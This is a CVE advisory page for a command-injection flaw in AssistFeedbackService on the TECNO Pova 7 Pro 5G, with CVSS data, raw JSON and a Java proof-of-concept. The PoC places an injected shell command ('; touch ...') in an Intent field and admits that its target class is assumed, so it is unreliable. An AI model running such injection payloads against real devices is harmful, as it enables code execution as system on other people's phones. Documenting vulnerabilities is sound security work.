Security Vulnerability Report
CVE-2026-0634 CVSS 7.8 HIGH

Published: 2026-04-02 09:16:20
Last Modified: 2026-04-03 16:10:53
Source: 907edf6c-bf03-423e-ab1a-8da27e1aa1ea

Description

Code execution in AssistFeedbackService of TECNO Pova7 Pro 5G on Android allows local apps to execute arbitrary code as system via command injection.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

TECNO Pova 7 Pro 5G

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
java
/*
 * PoC Concept for CVE-2026-0634
 * Demonstrates command injection in AssistFeedbackService
 */
import android.content.Intent;
import android.content.Context;
import android.util.Log;
public class CVE_2026_0634_PoC {
    private static final String TAG = "CVE-2026-0634_PoC";
    public static void exploit(Context context) {
        try {
            // Target the vulnerable service
            Intent intent = new Intent();
            intent.setClassName("com.android.settings", ".assist.AssistFeedbackService"); // Assumed package/class based on description
            // Construct malicious payload using command injection
            // Example: appending a command to touch a file to prove execution
            String maliciousInput = "normal_feedback; touch /data/local/tmp/cve_2026_0634_pwned #";
            // Put the payload into the Intent extra
            intent.putExtra("feedback_data", maliciousInput);
            // Start the service to trigger the vulnerability
            context.startService(intent);
            Log.i(TAG, "Payload sent successfully. Check /data/local/tmp/ for proof.");
        } catch (Exception e) {
            Log.e(TAG, "Exploit execution failed", e);
        }
    }
}

References

https://security.tecno.com/SRC/securityUpdates

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0634", "sourceIdentifier": "907edf6c-bf03-423e-ab1a-8da27e1aa1ea", "published": "2026-04-02T09:16:20.397", "lastModified": "2026-04-03T16:10:52.680", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Code execution in AssistFeedbackService of TECNO Pova7 Pro 5G on Android allows local apps to execute arbitrary code as system via command injection."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "907edf6c-bf03-423e-ab1a-8da27e1aa1ea", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-88"}]}], "references": [{"url": "https://security.tecno.com/SRC/securityUpdates", "source": "907edf6c-bf03-423e-ab1a-8da27e1aa1ea"}]}}